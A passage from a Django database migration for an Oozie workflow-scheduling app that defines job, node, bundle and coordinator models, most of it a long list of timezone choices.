('done_flag', models.CharField(blank=True, default=b'', help_text='The done file for the data set. If the Done flag is not specified, then Oozie configures Hadoop to create a _SUCCESS file in the output directory. If Done flag is set to empty, then Coordinator looks for the existence of the directory itself.', max_length=64, verbose_name='Done flag')),
('instance_choice', models.CharField(default=b'default', help_text='Customize the date instance(s), e.g. define a range of dates, use EL functions...', max_length=10, verbose_name='Instance type')),
('advanced_start_instance', models.CharField(default=b'0', help_text='Shift the frequency for gettting past/future start date or enter verbatim the Oozie start instance, e.g. ${coord:current(0)}', max_length=128, verbose_name='Start instance')),
('advanced_end_instance', models.CharField(blank=True, default=b'0', help_text='Optional: Shift the frequency for gettting past/future end dates or enter verbatim the Oozie end instance.', max_length=128, verbose_name='End instance')),
],
),
migrations.CreateModel(
name='History',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('submission_date', models.DateTimeField(auto_now=True, db_index=True)),
('oozie_job_id', models.CharField(max_length=128)),
('properties', models.TextField()),
],
),
migrations.CreateModel(
name='Job',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='Name of the job, which must be unique per user.', max_length=255, validators=[django.core.validators.RegexValidator(message='Enter a valid value: combination of 2 - 40 letters and digits starting by a letter', regex=b'^[a-zA-Z_][\\-_a-zA-Z0-9]{1,39}$')], verbose_name='Name')),
('description', models.CharField(blank=True, help_text='The purpose of the job.', max_length=1024, verbose_name='Description')),
('last_modified', models.DateTimeField(auto_now=True, db_index=True, verbose_name='Last modified')),
('schema_version', models.CharField(help_text='The version of the XML schema used to talk to Oozie.', max_length=128, verbose_name='Schema version')),
('deployment_dir', models.CharField(blank=True, help_text='The path on the HDFS where all the workflows and dependencies must be uploaded.', max_length=1024, verbose_name='HDFS deployment directory')),
('is_shared', models.BooleanField(db_index=True, default=False, help_text='Enable other users to have access to this job.', verbose_name='Is shared')),
('parameters', models.TextField(default=b'[{"name":"oozie.use.system.libpath","value":"true"}]', help_text='Parameters used at the submission time (e.g. market=US, oozie.use.system.libpath=true).', verbose_name='Oozie parameters')),
('is_trashed', models.BooleanField(db_index=True, default=False, help_text='If this job is trashed.', verbose_name='Is trashed')),
('data', models.TextField(blank=True, default=b'{}')),
],
),
migrations.CreateModel(
name='Link',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=40)),
('comment', models.CharField(blank=True, default=b'', max_length=1024)),
],
),
migrations.CreateModel(
name='Node',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='Name of the action, which must be unique by workflow.', max_length=255, validators=[django.core.validators.RegexValidator(message='Enter a valid value: combination of 2 - 40 letters and digits starting by a letter', regex=b'^[a-zA-Z_][\\-_a-zA-Z0-9]{1,39}$')], verbose_name='Name')),
('description', models.CharField(blank=True, default=b'', help_text='The purpose of the action.', max_length=1024, verbose_name='Description')),
('node_type', models.CharField(help_text='The type of action (e.g. MapReduce, Pig...)', max_length=64, verbose_name='Type')),
('data', models.TextField(blank=True, default=b'{}')),
],
),
migrations.CreateModel(
name='Bundle',
fields=[
('job_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Job')),
('kick_off_time', models.DateTimeField(auto_now=True, help_text='When to start the first coordinators.', verbose_name='Start')),
],
bases=('oozie.job',),
),
migrations.CreateModel(
name='Coordinator',
fields=[
('job_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='oozie.Job')),
('frequency_number', models.SmallIntegerField(choices=[(1, 1), (2, 2), (3, 3), (4, 4), (5, 5), (6, 6), (7, 7), (8, 8), (9, 9), (10, 10), (11, 11), (12, 12), (13, 13), (14, 14), (15, 15), (16, 16), (17, 17), (18, 18), (19, 19), (20, 20), (21, 21), (22, 22), (23, 23), (24, 24), (25, 25), (26, 26), (27, 27), (28, 28), (29, 29), (30, 30), (31, 31), (32, 32), (33, 33), (34, 34), (35, 35), (36, 36), (37, 37), (38, 38), (39, 39), (40, 40), (41, 41), (42, 42), (43, 43), (44, 44), (45, 45), (46, 46), (47, 47), (48, 48), (49, 49), (50, 50), (51, 51), (52, 52), (53, 53), (54, 54), (55, 55), (56, 56), (57, 57), (58, 58), (59, 59), (60, 60)], default=1, help_text='The number of units of the rate at which data is periodically created.', verbose_name='Frequency number')),
('frequency_unit', models.CharField(choices=[(b'minutes', 'Minutes'), (b'hours', 'Hours'), (b'days', 'Days'), (b'months', 'Months')], default=b'days', help_text='The unit of the rate at which data is periodically created.', max_length=20, verbose_name='Frequency unit')),
('timezone', models.CharField(choices=[(b'Africa/Abidjan', b'Africa/Abidjan'), (b'Africa/Accra', b'Africa/Accra'), (b'Africa/Addis_Ababa', b'Africa/Addis_Ababa'), (b'Africa/Algiers', b'Africa/Algiers'), (b'Africa/Asmara', b'Africa/Asmara'), (b'Africa/Asmera', b'Africa/Asmera'), (b'Africa/Bamako', b'Africa/Bamako'), (b'Africa/Bangui', b'Africa/Bangui'), (b'Africa/Banjul', b'Africa/Banjul'), (b'Africa/Bissau', b'Africa/Bissau'), (b'Africa/Blantyre', b'Africa/Blantyre'), (b'Africa/Brazzaville', b'Africa/Brazzaville'), (b'Africa/Bujumbura', b'Africa/Bujumbura'), (b'Africa/Cairo', b'Africa/Cairo'), (b'Africa/Casablanca', b'Africa/Casablanca'), (b'Africa/Ceuta', b'Africa/Ceuta'), (b'Africa/Conakry', b'Africa/Conakry'), (b'Africa/Dakar', b'Africa/Dakar'), (b'Africa/Dar_es_Salaam', b'Africa/Dar_es_Salaam'), (b'Africa/Djibouti', b'Africa/Djibouti'), (b'Africa/Douala', b'Africa/Douala'), (b'Africa/El_Aaiun', b'Africa/El_Aaiun'), (b'Africa/Freetown', b'Africa/Freetown'), (b'Africa/Gaborone', b'Africa/Gaborone'), (b'Africa/Harare', b'Africa/Harare'), (b'Africa/Johannesburg', b'Africa/Johannesburg'), (b'Africa/Juba', b'Africa/Juba'), (b'Africa/Kampala', b'Africa/Kampala'), (b'Africa/Khartoum', b'Africa/Khartoum'), (b'Africa/Kigali', b'Africa/Kigali'), (b'Africa/Kinshasa', b'Africa/Kinshasa'), (b'Africa/Lagos', b'Africa/Lagos'), (b'Africa/Libreville', b'Africa/Libreville'), (b'Africa/Lome', b'Africa/Lome'), (b'Africa/Luanda', b'Africa/Luanda'), (b'Africa/Lubumbashi', b'Africa/Lubumbashi'), (b'Africa/Lusaka', b'Africa/Lusaka'), (b'Africa/Malabo', b'Africa/Malabo'), (b'Africa/Maputo', b'Africa/Maputo'), (b'Africa/Maseru', b'Africa/Maseru'), (b'Africa/Mbabane', b'Africa/Mbabane'), (b'Africa/Mogadishu', b'Africa/Mogadishu'), (b'Africa/Monrovia', b'Africa/Monrovia'), (b'Africa/Nairobi', b'Africa/Nairobi'), (b'Africa/Ndjamena', b'Africa/Ndjamena'), (b'Africa/Niamey', b'Africa/Niamey'), (b'Africa/Nouakchott', b'Africa/Nouakchott'), (b'Africa/Ouagadougou', b'Africa/Ouagadougou'), (b'Africa/Porto-Novo', b'Africa/Porto-Novo'), (b'Africa/Sao_Tome', b'Africa/Sao_Tome'), (b'Africa/Timbuktu', b'Africa/Timbuktu'), (b'Africa/Tripoli', b'Africa/Tripoli'), (b'Africa/Tunis', b'Africa/Tunis'), (b'Africa/Windhoek', b'Africa/Windhoek'), (b'America/Adak', b'America/Adak'), (b'America/Anchorage', b'America/Anchorage'), (b'America/Anguilla', b'America/Anguilla'), (b'America/Antigua', b'America/Antigua'), (b'America/Araguaina', b'America/Araguaina'), (b'America/Argentina/Buenos_Aires', b'America/Argentina/Buenos_Aires'), (b'America/Argentina/Catamarca', b'America/Argentina/Catamarca'), (b'America/Argentina/ComodRivadavia', b'America/Argentina/ComodRivadavia'), (b'America/Argentina/Cordoba', b'America/Argentina/Cordoba'), (b'America/Argentina/Jujuy', b'America/Argentina/Jujuy'), (b'America/Argentina/La_Rioja', b'America/Argentina/La_Rioja'), (b'America/Argentina/Mendoza', b'America/Argentina/Mendoza'), (b'America/Argentina/Rio_Gallegos', b'America/Argentina/Rio_Gallegos'), (b'America/Argentina/Salta', b'America/Argentina/Salta'), (b'America/Argentina/San_Juan', b'America/Argentina/San_Juan'), (b'America/Argentina/San_Luis', b'America/Argentina/San_Luis'), (b'America/Argentina/Tucuman', b'America/Argentina/Tucuman'), (b'America/Argentina/Ushuaia', b'America/Argentina/Ushuaia'), (b'America/Aruba', b'America/Aruba'), (b'America/Asuncion', b'America/Asuncion'), (b'America/Atikokan', b'America/Atikokan'), (b'America/Atka', b'America/Atka'), (b'America/Bahia', b'America/Bahia'), (b'America/Bahia_Banderas', b'America/Bahia_Banderas'), (b'America/Barbados', b'America/Barbados'), (b'America/Belem', b'America/Belem'), (b'America/Belize', b'America/Belize'), (b'America/Blanc-Sablon', b'America/Blanc-Sablon'), (b'America/Boa_Vista', b'America/Boa_Vista'), (b'America/Bogota', b'America/Bogota'), (b'America/Boise', b'America/Boise'), (b'America/Buenos_Aires', b'America/Buenos_Aires'), (b'America/Cambridge_Bay', b'America/Cambridge_Bay'), (b'America/Campo_Grande', b'America/Campo_Grande'), (b'America/Cancun', b'America/Cancun'), (b'America/Caracas', b'America/Caracas'), (b'America/Catamarca', b'America/Catamarca'), (b'America/Cayenne', b'America/Cayenne'), (b'America/Cayman', b'America/Cayman'), (b'America/Chicago', b'America/Chicago'), (b'America/Chihuahua', b'America/Chihuahua'), (b'America/Coral_Harbour', b'America/Coral_Harbour'), (b'America/Cordoba', b'America/Cordoba'), (b'America/Costa_Rica', b'America/Costa_Rica'), (b'America/Creston', b'America/Creston'), (b'America/Cuiaba', b'America/Cuiaba'), (b'America/Curacao', b'America/Curacao'), (b'America/Danmarkshavn', b'America/Danmarkshavn'), (b'America/Dawson', b'America/Dawson'), (b'America/Dawson_Creek', b'America/Dawson_Creek'), (b'America/Denver', b'America/Denver'), (b'America/Detroit', b'America/Detroit'), (b'America/Dominica', b'America/Dominica'), (b'America/Edmonton', b'America/Edmonton'), (b'America/Eirunepe', b'America/Eirunepe'), (b'America/El_Salvador', b'America/El_Salvador'), (b'America/Ensenada', b'America/Ensenada'), (b'America/Fort_Wayne', b'America/Fort_Wayne'), (b'America/Fortaleza', b'America/Fortaleza'), (b'America/Glace_Bay', b'America/Glace_Bay'), (b'America/Godthab', b'America/Godthab'), (b'America/Goose_Bay', b'America/Goose_Bay'), (b'America/Grand_Turk', b'America/Grand_Turk'), (b'America/Grenada', b'America/Grenada'), (b'America/Guadeloupe', b'America/Guadeloupe'), (b'America/Guatemala', b'America/Guatemala'), (b'America/Guayaquil', b'America/Guayaquil'), (b'America/Guyana', b'America/Guyana'), (b'America/Halifax', b'America/Halifax'), (b'America/Havana', b'America/Havana'), (b'America/Hermosillo', b'America/Hermosillo'), (b'America/Indiana/Indianapolis', b'America/Indiana/Indianapolis'), (b'America/Indiana/Knox', b'America/Indiana/Knox'), (b'America/Indiana/Marengo', b'America/Indiana/Marengo'), (b'America/Indiana/Petersburg', b'America/Indiana/Petersburg'), (b'America/Indiana/Tell_City', b'America/Indiana/Tell_City'), (b'America/Indiana/Vevay', b'America/Indiana/Vevay'), (b'America/Indiana/Vincennes', b'America/Indiana/Vincennes'), (b'America/Indiana/Winamac', b'America/Indiana/Winamac'), (b'America/Indianapolis', b'America/Indianapolis'), (b'America/Inuvik', b'America/Inuvik'), (b'America/Iqaluit', b'America/Iqaluit'), (b'America/Jamaica', b'America/Jamaica'), (b'America/Jujuy', b'America/Jujuy'), (b'America/Juneau', b'America/Juneau'), (b'America/Kentucky/Louisville', b'America/Kentucky/Louisville'), (b'America/Kentucky/Monticello', b'America/Kentucky/Monticello'), (b'America/Knox_IN', b'America/Knox_IN'), (b'America/Kralendijk', b'America/Kralendijk'), (b'America/La_Paz', b'America/La_Paz'), (b'America/Lima', b'America/Lima'), (b'America/Los_Angeles', b'America/Los_Angeles'), (b'America/Louisville', b'America/Louisville'), (b'America/Lower_Princes', b'America/Lower_Princes'), (b'America/Maceio', b'America/Maceio'), (b'America/Managua', b'America/Managua'), (b'America/Manaus', b'America/Manaus'), (b'America/Marigot', b'America/Marigot'), (b'America/Martinique', b'America/Martinique'), (b'America/Matamoros', b'America/Matamoros'), (b'America/Mazatlan', b'America/Mazatlan'), (b'America/Mendoza', b'America/Mendoza'), (b'America/Menominee', b'America/Menominee'), (b'America/Merida', b'America/Merida'), (b'America/Metlakatla', b'America/Metlakatla'), (b'America/Mexico_City', b'America/Mexico_City'), (b'America/Miquelon', b'America/Miquelon'), (b'America/Moncton', b'America/Moncton'), (b'America/Monterrey', b'America/Monterrey'), (b'America/Montevideo', b'America/Montevideo'), (b'America/Montreal', b'America/Montreal'), (b'America/Montserrat', b'America/Montserrat'), (b'America/Nassau', b'America/Nassau'), (b'America/New_York', b'America/New_York'), (b'America/Nipigon', b'America/Nipigon'), (b'America/Nome', b'America/Nome'), (b'America/Noronha', b'America/Noronha'), (b'America/North_Dakota/Beulah', b'America/North_Dakota/Beulah'), (b'America/North_Dakota/Center', b'America/North_Dakota/Center'), (b'America/North_Dakota/New_Salem', b'America/North_Dakota/New_Salem'), (b'America/Ojinaga', b'America/Ojinaga'), (b'America/Panama', b'America/Panama'), (b'America/Pangnirtung', b'America/Pangnirtung'), (b'America/Paramaribo', b'America/Paramaribo'), (b'America/Phoenix', b'America/Phoenix'), (b'America/Port-au-Prince', b'America/Port-au-Prince'), (b'America/Port_of_Spain', b'America/Port_of_Spain'), (b'America/Porto_Acre', b'America/Porto_Acre'), (b'America/Porto_Velho', b'America/Porto_Velho'), (b'America/Puerto_Rico', b'America/Puerto_Rico'), (b'America/Rainy_River', b'America/Rainy_River'), (b'America/Rankin_Inlet', b'America/Rankin_Inlet'), (b'America/Recife', b'America/Recife'), (b'America/Regina', b'America/Regina'), (b'America/Resolute', b'America/Resolute'), (b'America/Rio_Branco', b'America/Rio_Branco'), (b'America/Rosario', b'America/Rosario'), (b'America/Santa_Isabel', b'America/Santa_Isabel'), (b'America/Santarem', b'America/Santarem'), (b'America/Santiago', b'America/Santiago'), (b'America/Santo_Domingo', b'America/Santo_Domingo'), (b'America/Sao_Paulo', b'America/Sao_Paulo'), (b'America/Scoresbysund', b'America/Scoresbysund'), (b'America/Shiprock', b'America/Shiprock'), (b'America/Sitka', b'America/Sitka'), (b'America/St_Barthelemy', b'America/St_Barthelemy'), (b'America/St_Johns', b'America/St_Johns'), (b'America/St_Kitts', b'America/St_Kitts'), (b'America/St_Lucia', b'America/St_Lucia'), (b'America/St_Thomas', b'America/St_Thomas'), (b'America/St_Vincent', b'America/St_Vincent'), (b'America/Swift_Current', b'America/Swift_Current'), (b'America/Tegucigalpa', b'America/Tegucigalpa'), (b'America/Thule', b'America/Thule'), (b'America/Thunder_Bay', b'America/Thunder_Bay'), (b'America/Tijuana', b'America/Tijuana'), (b'America/Toronto', b'America/Toronto'), (b'America/Tortola', b'America/Tortola'), (b'America/Vancouver', b'America/Vancouver'), (b'America/Virgin', b'America/Virgin'), (b'America/Whitehorse', b'America/Whitehorse'), (b'America/Winnipeg', b'America/Winnipeg'), (b'America/Yakutat', b'America/Yakutat'), (b'America/Yellowknife', b'America/Yellowknife'), (b'Antarctica/Casey', b'Antarctica/Casey'), (b'Antarctica/Davis', b'Antarctica/Davis'), (b'Antarctica/DumontDUrville', b'Antarctica/DumontDUrville'), (b'Antarctica/Macquarie', b'Antarctica/Macquarie'), (b'Antarctica/Mawson', b'Antarctica/Mawson'), (b'Antarctica/McMurdo', b'Antarctica/McMurdo'), (b'Antarctica/Palmer', b'Antarctica/Palmer'), (b'Antarctica/Rothera', b'Antarctica/Rothera'), (b'Antarctica/South_Pole', b'Antarctica/South_Pole'), (b'Antarctica/Syowa', b'Antarctica/Syowa'), (b'Antarctica/Vostok', b'Antarctica/Vostok'), (b'Arctic/Longyearbyen', b'Arctic/Longyearbyen'), (b'Asia/Aden', b'Asia/Aden'), (b'Asia/Almaty', b'Asia/Almaty'), (b'Asia/Amman', b'Asia/Amman'), (b'Asia/Anadyr', b'Asia/Anadyr'), (b'Asia/Aqtau', b'Asia/Aqtau'), (b'Asia/Aqtobe', b'Asia/Aqtobe'), (b'Asia/Ashgabat', b'Asia/Ashgabat'), (b'Asia/Ashkhabad', b'Asia/Ashkhabad'), (b'Asia/Baghdad', b'Asia/Baghdad'), (b'Asia/Bahrain', b'Asia/Bahrain'), (b'Asia/Baku', b'Asia/Baku'), (b'Asia/Bangkok', b'Asia/Bangkok'), (b'Asia/Beijing', b'Asia/Beijing'), (b'Asia/Beirut', b'Asia/Beirut'), (b'Asia/Bishkek', b'Asia/Bishkek'), (b'Asia/Brunei', b'Asia/Brunei'), (b'Asia/Calcutta', b'Asia/Calcutta'), (b'Asia/Choibalsan', b'Asia/Choibalsan'), (b'Asia/Chongqing', b'Asia/Chongqing'), (b'Asia/Chungking', b'Asia/Chungking'), (b'Asia/Colombo', b'Asia/Colombo'), (b'Asia/Dacca', b'Asia/Dacca'), (b'Asia/Damascus', b'Asia/Damascus'), (b'Asia/Dhaka', b'Asia/Dhaka'), (b'Asia/Dili', b'Asia/Dili'), (b'Asia/Dubai', b'Asia/Dubai'), (b'Asia/Dushanbe', b'Asia/Dushanbe'), (b'Asia/Gaza', b'Asia/Gaza'), (b'Asia/Harbin', b'Asia/Harbin'), (b'Asia/Hebron', b'Asia/Hebron'), (b'Asia/Ho_Chi_Minh', b'Asia/Ho_Chi_Minh'), (b'Asia/Hong_Kong', b'Asia/Hong_Kong'), (b'Asia/Hovd', b'Asia/Hovd'), (b'Asia/Irkutsk', b'Asia/Irkutsk'), (b'Asia/Istanbul', b'Asia/Istanbul'), (b'Asia/Jakarta', b'Asia/Jakarta'), (b'Asia/Jayapura', b'Asia/Jayapura'), (b'Asia/Jerusalem', b'Asia/Jerusalem'), (b'Asia/Kabul', b'Asia/Kabul'), (b'Asia/Kamchatka', b'Asia/Kamchatka'), (b'Asia/Karachi', b'Asia/Karachi'), (b'Asia/Kashgar', b'Asia/Kashgar'), (b'Asia/Kathmandu', b'Asia/Kathmandu'), (b'Asia/Katmandu', b'Asia/Katmandu'), (b'Asia/Kolkata', b'Asia/Kolkata'), (b'Asia/Krasnoyarsk', b'Asia/Krasnoyarsk'), (b'Asia/Kuala_Lumpur', b'Asia/Kuala_Lumpur'), (b'Asia/Kuching', b'Asia/Kuching'), (b'Asia/Kuwait', b'Asia/Kuwait'), (b'Asia/Macao', b'Asia/Macao'), (b'Asia/Macau', b'Asia/Macau'), (b'Asia/Magadan', b'Asia/Magadan'), (b'Asia/Makassar', b'Asia/Makassar'), (b'Asia/Manila', b'Asia/Manila'), (b'Asia/Muscat', b'Asia/Muscat'), (b'Asia/Nicosia', b'Asia/Nicosia'), (b'Asia/Novokuznetsk', b'Asia/Novokuznetsk'), (b'Asia/Novosibirsk', b'Asia/Novosibirsk'), (b'Asia/Omsk', b'Asia/Omsk'), (b'Asia/Oral', b'Asia/Oral'), (b'Asia/Phnom_Penh', b'Asia/Phnom_Penh'), (b'Asia/Pontianak', b'Asia/Pontianak'), (b'Asia/Pyongyang', b'Asia/Pyongyang'), (b'Asia/Qatar', b'Asia/Qatar'), (b'Asia/Qyzylorda', b'Asia/Qyzylorda'), (b'Asia/Rangoon', b'Asia/Rangoon'), (b'Asia/Riyadh', b'Asia/Riyadh'), (b'Asia/Riyadh87', b'Asia/Riyadh87'), (b'Asia/Riyadh88', b'Asia/Riyadh88'), (b'Asia/Riyadh89', b'Asia/Riyadh89'), (b'Asia/Saigon', b'Asia/Saigon'), (b'Asia/Sakhalin', b'Asia/Sakhalin'), (b'Asia/Samarkand', b'Asia/Samarkand'), (b'Asia/Seoul', b'Asia/Seoul'), (b'Asia/Shanghai', b'Asia/Shanghai'), (b'Asia/Singapore', b'Asia/Singapore'), (b'Asia/Taipei', b'Asia/Taipei'), (b'Asia/Tashkent', b'Asia/Tashkent'), (b'Asia/Tbilisi', b'Asia/Tbilisi'), (b'Asia/Tehran', b'Asia/Tehran'), (b'Asia/Tel_Aviv', b'Asia/Tel_Aviv'), (b'Asia/Thimbu', b'Asia/Thimbu'), (b'Asia/Thimphu', b'Asia/Thimphu'), (b'Asia/Tokyo', b'Asia/Tokyo'), (b'Asia/Ujung_Pandang', b'Asia/Ujung_Pandang'), (b'Asia/Ulaanbaatar', b'Asia/Ulaanbaatar'), (b'Asia/Ulan_Bator', b'Asia/Ulan_Bator'), (b'Asia/Urumqi', b'Asia/Urumqi'), (b'Asia/Vientiane', b'Asia/Vientiane'), (b'Asia/Vladivostok', b'Asia/Vladivostok'), (b'Asia/Yakutsk', b'Asia/Yakutsk'), (b'Asia/Yekaterinburg', b'Asia/Yekaterinburg'), (b'Asia/Yerevan', b'Asia/Yerevan'), (b'Atlantic/Azores', b'Atlantic/Azores'), (b'Atlantic/Bermuda', b'Atlantic/Bermuda'), (b'Atlantic/Canary', b'Atlantic/Canary'), (b'Atlantic/Cape_Verde', b'Atlantic/Cape_Verde'), (b'Atlantic/Faeroe', b'Atlantic/Faeroe'), (b'Atlantic/Faroe', b'Atlantic/Faroe'), (b'Atlantic/Jan_Mayen', b'Atlantic/Jan_Mayen'), (b'Atlantic/Madeira', b'Atlantic/Madeira'), (b'Atlantic/Reykjavik', b'Atlantic/Reykjavik'), (b'Atlantic/South_Georgia', b'Atlantic/South_Georgia'), (b'Atlantic/St_Helena', b'Atlantic/St_Helena'), (b'Atlantic/Stanley', b'Atlantic/Stanley'), (b'Australia/ACT', b'Australia/ACT'), (b'Australia/Adelaide', b'Australia/Adelaide'), (b'Australia/Brisbane', b'Australia/Brisbane'), (b'Australia/Broken_Hill', b'Australia/Broken_Hill'), (b'Australia/Canberra', b'Australia/Canberra'), (b'Australia/Currie', b'Australia/Currie'), (b'Australia/Darwin', b'Australia/Darwin'), (b'Australia/Eucla', b'Australia/Eucla'), (b'Australia/Hobart', b'Australia/Hobart'), (b'Australia/LHI', b'Australia/LHI'), (b'Australia/Lindeman', b'Australia/Lindeman'), (b'Australia/Lord_Howe', b'Australia/Lord_Howe'), (b'Australia/Melbourne', b'Australia/Melbourne'), (b'Australia/NSW', b'Australia/NSW'), (b'Australia/North', b'Australia/North'), (b'Australia/Perth', b'Australia/Perth'), (b'Australia/Queensland', b'Australia/Queensland'), (b'Australia/South', b'Australia/South'), (b'Australia/Sydney', b'Australia/Sydney'), (b'Australia/Tasmania', b'Australia/Tasmania'), (b'Australia/Victoria', b'Australia/Victoria'), (b'Australia/West', b'Australia/West'), (b'Australia/Yancowinna', b'Australia/Yancowinna'), (b'Brazil/Acre', b'Brazil/Acre'), (b'Brazil/DeNoronha', b'Brazil/DeNoronha'), (b'Brazil/East', b'Brazil/East'), (b'Brazil/West', b'Brazil/West'), (b'CET', b'CET'), (b'CST6CDT', b'CST6CDT'), (b'Canada/Atlantic', b'Canada/Atlantic'), (b'Canada/Central', b'Canada/Central'), (b'Canada/East-Saskatchewan', b'Canada/East-Saskatchewan'), (b'Canada/Eastern', b'Canada/Eastern'), (b'Canada/Mountain', b'Canada/Mountain'), (b'Canada/Newfoundland', b'Canada/Newfoundland'), (b'Canada/Pacific', b'Canada/Pacific'), (b'Canada/Saskatchewan', b'Canada/Saskatchewan'), (b'Canada/Yukon', b'Canada/Yukon'), (b'Chile/Continental', b'Chile/Continental'), (b'Chile/EasterIsland', b'Chile/EasterIsland'), (b'Cuba', b'Cuba'), (b'EET', b'EET'), (b'EST', b'EST'), (b'EST5EDT', b'EST5EDT'), (b'Egypt', b'Egypt'), (b'Eire', b'Eire'), (b'Etc/GMT', b'Etc/GMT'), (b'Etc/GMT+0', b'Etc/GMT+0'), (b'Etc/GMT+1', b'Etc/GMT+1'), (b'Etc/GMT+10', b'Etc/GMT+10'), (b'Etc/GMT+11', b'Etc/GMT+11'), (b'Etc/GMT+12', b'Etc/GMT+12'), (b'Etc/GMT+2', b'Etc/GMT+2'), (b'Etc/GMT+3', b'Etc/GMT+3'), (b'Etc/GMT+4', b'Etc/GMT+4'), (b'Etc/GMT+5', b'Etc/GMT+5'), (b'Etc/GMT+6', b'Etc/GMT+6'), (b'Etc/GMT+7', b'Etc/GMT+7'), (b'Etc/GMT+8', b'Etc/GMT+8'), (b'Etc/GMT+9', b'Etc/GMT+9'), (b'Etc/GMT-0', b'Etc/GMT-0'), (b'Etc/GMT-1', b'Etc/GMT-1'), (b'Etc/GMT-10', b'Etc/GMT-10'), (b'Etc/GMT-11', b'Etc/GMT-11'), (b'Etc/GMT-12', b'Etc/GMT-12'), (b'Etc/GMT-13', b'Etc/GMT-13'), (b'Etc/GMT-14', b'Etc/GMT-14'), (b'Etc/GMT-2', b'Etc/GMT-2'), (b'Etc/GMT-3', b'Etc/GMT-3'), (b'Etc/GMT-4', b'Etc/GMT-4'), (b'Etc/GMT-5', b'Etc/GMT-5'), (b'Etc/GMT-6', b'Etc/GMT-6'), (b'Etc/GMT-7', b'Etc/GMT-7'), (b'Etc/GMT-8', b'Etc/GMT-8'), (b'Etc/GMT-9', b'Etc/GMT-9'), (b'Etc/GMT0', b'Etc/GMT0'), (b'Etc/Greenwich', b'Etc/Greenwich'), (b'Etc/UCT', b'Etc/UCT'), (b'Etc/UTC', b'Etc/UTC'), (b'Etc/Universal', b'Etc/Universal'), (b'Etc/Zulu', b'Etc/Zulu'), (b'Europe/Amsterdam', b'Europe/Amsterdam'), (b'Europe/Andorra', b'Europe/Andorra'), (b'Europe/Athens', b'Europe/Athens'), (b'Europe/Belfast', b'Europe/Belfast'), (b'Europe/Belgrade', b'Europe/Belgrade'), (b'Europe/Berlin', b'Europe/Berlin'), (b'Europe/Bratislava', b'Europe/Bratislava'), (b'Europe/Brussels', b'Europe/Brussels'), (b'Europe/Bucharest', b'Europe/Bucharest'), (b'Europe/Budapest', b'Europe/Budapest'), (b'Europe/Chisinau', b'Europe/Chisinau'), (b'Europe/Copenhagen', b'Europe/Copenhagen'), (b'Europe/Dublin', b'Europe/Dublin'), (b'Europe/Gibraltar', b'Europe/Gibraltar'), (b'Europe/Guernsey', b'Europe/Guernsey'), (b'Europe/Helsinki', b'Europe/Helsinki'), (b'Europe/Isle_of_Man', b'Europe/Isle_of_Man'), (b'Europe/Istanbul', b'Europe/Istanbul'), (b'Europe/Jersey', b'Europe/Jersey'), (b'Europe/Kaliningrad', b'Europe/Kaliningrad'), (b'Europe/Kiev', b'Europe/Kiev'), (b'Europe/Lisbon', b'Europe/Lisbon'), (b'Europe/Ljubljana', b'Europe/Ljubljana'), (b'Europe/London', b'Europe/London'), (b'Europe/Luxembourg', b'Europe/Luxembourg'), (b'Europe/Madrid', b'Europe/Madrid'), (b'Europe/Malta', b'Europe/Malta'), (b'Europe/Mariehamn', b'Europe/Mariehamn'), (b'Europe/Minsk', b'Europe/Minsk'), (b'Europe/Monaco', b'Europe/Monaco'), (b'Europe/Moscow', b'Europe/Moscow'), (b'Europe/Nicosia', b'Europe/Nicosia'), (b'Europe/Oslo', b'Europe/Oslo'), (b'Europe/Paris', b'Europe/Paris'), (b'Europe/Podgorica', b'Europe/Podgorica'), (b'Europe/Prague', b'Europe/Prague'), (b'Europe/Riga', b'Europe/Riga'), (b'Europe/Rome', b'Europe/Rome'), (b'Europe/Samara', b'Europe/Samara'), (b'Europe/San_Marino', b'Europe/San_Marino'), (b'Europe/Sarajevo', b'Europe/Sarajevo'), (b'Europe/Simferopol', b'Europe/Simferopol'), (b'Europe/Skopje', b'Europe/Skopje'), (b'Europe/Sofia', b'Europe/Sofia'), (b'Europe/Stockholm', b'Europe/Stockholm'), (b'Europe/Tallinn', b'Europe/Tallinn'), (b'Europe/Tirane', b'Europe/Tirane'), (b'Europe/Tiraspol', b'Europe/Tiraspol'), (b'Europe/Uzhgorod', b'Europe/Uzhgorod'), (b'Europe/Vaduz', b'Europe/Vaduz'), (b'Europe/Vatican', b'Europe/Vatican'), (b'Europe/Vienna', b'Europe/Vienna'), (b'Europe/Vilnius', b'Europe/Vilnius'), (b'Europe/Volgograd', b'Europe/Volgograd'), (b'Europe/Warsaw', b'Europe/Warsaw'), (b'Europe/Zagreb', b'Europe/Zagreb'), (b'Europe/Zaporozhye', b'Europe/Zaporozhye'), (b'Europe/Zurich', b'Europe/Zurich'), (b'Factory', b'Factory'), (b'GB', b'GB'), (b'GB-Eire', b'GB-Eire'), (b'GMT', b'GMT'), (b'GMT+0', b'GMT+0'), (b'GMT+1', b'GMT+1'), (b'GMT+10', b'GMT+10'), (b'GMT+11', b'GMT+11'), (b'GMT+12', b'GMT+12'), (b'GMT+13', b'GMT+13'), (b'GMT+14', b'GMT+14'), (b'GMT+2', b'GMT+2'), (b'GMT+3', b'GMT+3'), (b'GMT+4', b'GMT+4'), (b'GMT+5', b'GMT+5'), (b'GMT+6', b'GMT+6'), (b'GMT+7', b'GMT+7'), (b'GMT+8', b'GMT+8'), (b'GMT+9', b'GMT+9'), (b'GMT-0', b'GMT-0'), (b'GMT-1', b'GMT-1'), (b'GMT-10', b'GMT-10'), (b'GMT-11', b'GMT-11'), (b'GMT-12', b'GMT-12'), (b'GMT-2', b'GMT-2'), (b'GMT-3', b'GMT-3'), (b'GMT-4', b'GMT-4'), (b'GMT-5', b'GMT-5'), (b'GMT-6', b'GMT-6'), (b'GMT-7', b'GMT-7'), (b'GMT-8', b'GMT-8'), (b'GMT-9', b'GMT-9'), (b'GMT0', b'GMT0'), (b'Greenwich', b'Greenwich'), (b'HST', b'HST'), (b'Hongkong', b'Hongkong'), (b'Iceland', b'Iceland'), 